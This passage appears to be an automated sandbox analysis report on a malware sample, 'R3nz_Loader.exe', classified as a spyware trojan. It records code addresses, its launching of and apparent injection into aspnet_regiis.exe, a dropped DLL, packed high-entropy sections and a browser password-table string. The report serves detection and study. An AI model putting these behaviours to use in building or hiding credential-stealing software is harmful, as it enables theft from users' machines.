                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277FB503_2_0277FB50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279F3403_2_0279F340
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027683203_2_02768320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279031D3_2_0279031D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278BBFA3_2_0278BBFA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027743D03_2_027743D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027693903_2_02769390
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02764B903_2_02764B90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E3803_2_0279E380
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027970703_2_02797070
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279B8603_2_0279B860
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279F0503_2_0279F050
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027918473_2_02791847
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277A8203_2_0277A820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027778283_2_02777828
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278B0DD3_2_0278B0DD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276B0C03_2_0276B0C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027690B03_2_027690B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027638B03_2_027638B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027658B03_2_027658B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027838903_2_02783890
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027800903_2_02780090
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027960813_2_02796081
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027819503_2_02781950
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027761463_2_02776146
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277712B3_2_0277712B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276B9093_2_0276B909
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278B1EA3_2_0278B1EA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278D1C03_2_0278D1C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E9A03_2_0279E9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027711963_2_02771196
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278EE793_2_0278EE79
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02787E5C3_2_02787E5C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E6403_2_0279E640
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02785E003_2_02785E00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02765ED03_2_02765ED0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277C6B03_2_0277C6B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027836B03_2_027836B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02784EB03_2_02784EB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02762E903_2_02762E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277BE803_2_0277BE80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277CF703_2_0277CF70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027987703_2_02798770
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027887483_2_02788748
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027797203_2_02779720
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02798F193_2_02798F19
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027667003_2_02766700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02776FF03_2_02776FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027877F33_2_027877F3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02778FE73_2_02778FE7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278DFE93_2_0278DFE9
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027697D03_2_027697D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027957D23_2_027957D2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027867A13_2_027867A1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027907A03_2_027907A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278C78B3_2_0278C78B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027794703_2_02779470
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02795C693_2_02795C69
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276DC623_2_0276DC62
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02786C533_2_02786C53
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277DC303_2_0277DC30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02787C363_2_02787C36
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279C42E3_2_0279C42E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027834003_2_02783400
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027984FF3_2_027984FF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277ECF03_2_0277ECF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027674E03_2_027674E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276B49D3_2_0276B49D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02782D703_2_02782D70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E5203_2_0279E520
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027794703_2_02779470
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027815B03_2_027815B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E5B03_2_0279E5B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02776D9A3_2_02776D9A
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 027743C0 appears 69 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02768020 appears 44 times
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1224
                          Source: R3nz_Loader.exe, 00000000.00000000.2009877409.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXeniaHarveyKaitlyn.pdfkW4 vs R3nz_Loader.exe
                          Source: R3nz_Loader.exe, 00000000.00000002.2234322124.000000000128E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs R3nz_Loader.exe
                          Source: R3nz_Loader.exeBinary or memory string: OriginalFilenameXeniaHarveyKaitlyn.pdfkW4 vs R3nz_Loader.exe
                          Source: R3nz_Loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: R3nz_Loader.exeStatic PE information: Section: ^]tBD;I ZLIB complexity 1.0003187697249774
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@1/1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02797BA0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,3_2_02797BA0
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6716:120:WilError_03
                          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2684
                          Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\962343f8-2ba8-45a0-ad7c-aa94d894f88dJump to behavior
                          Source: R3nz_Loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: aspnet_regiis.exe, 00000003.00000003.2041331876.0000000004F2A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2041224294.0000000004F45000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2053288404.0000000004F52000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: R3nz_Loader.exeReversingLabs: Detection: 34%
                          Source: R3nz_Loader.exeString found in binary or memory: -addpset
                          Source: R3nz_Loader.exeString found in binary or memory: -addfulltrust
                          Source: R3nz_Loader.exeString found in binary or memory: -addgroup
                          Source: R3nz_Loader.exeString found in binary or memory: -help
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeFile read: C:\Users\user\Desktop\R3nz_Loader.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\R3nz_Loader.exe "C:\Users\user\Desktop\R3nz_Loader.exe"
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2684 -s 1224
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                          Source: R3nz_Loader.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: R3nz_Loader.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012C1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Users\user\Desktop\R3nz_Loader.PDB source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012C1000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: %%.pdb source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\user\Desktop\R3nz_Loader.PDB source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.pdb source: WER3C4D.tmp.dmp.6.dr
                          Source: Binary string: mscorlib.ni.pdb source: WER3C4D.tmp.dmp.6.dr
                          Source: Binary string: n0C:\Windows\mscorlib.pdb source: R3nz_Loader.exe, 00000000.00000002.2233663238.0000000000EF9000.00000004.00000010.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbLL source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001339000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\mscorlib.pdb source: R3nz_Loader.exe, 00000000.00000002.2234322124.00000000012EC000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001339000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb8 source: R3nz_Loader.exe, 00000000.00000002.2234322124.0000000001326000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: mscorlib.ni.pdbRSDS source: WER3C4D.tmp.dmp.6.dr

                          Data Obfuscation

                          barindex
                          Detected unpacking (changes PE section rights)
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeUnpacked PE file: 0.2.R3nz_Loader.exe.a10000.0.unpack ^]tBD;I:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
                          Source: R3nz_Loader.exeStatic PE information: section name: ^]tBD;I
                          Source: R3nz_Loader.exeStatic PE information: section name:
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A156EF push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A13AFF push esi; iretd 0_2_00A13B00
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A156CC push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A15801 push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A16A00 push edi; iretd 0_2_00A16A01
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A16465 push 1E68DD25h; retf 0_2_00A1646B
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A1567B push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A1427A push ds; iretd 0_2_00A14283
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A1564A push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A1564F push esi; iretd 0_2_00A15846
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A127B0 push ebx; retf 0_2_00A127B5
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A1573A push esi; iretd 0_2_00A15736
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A15715 push esi; iretd 0_2_00A15736
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A12519 push edi; retf 0_2_00A1251A
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeCode function: 0_2_00A1575F push esi; iretd 0_2_00A15846
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E220 push eax; mov dword ptr [esp], 66616053h3_2_0279E222
                          Source: R3nz_Loader.exeStatic PE information: section name: ^]tBD;I entropy: 7.999688407134414
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\R3nz_Loader.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
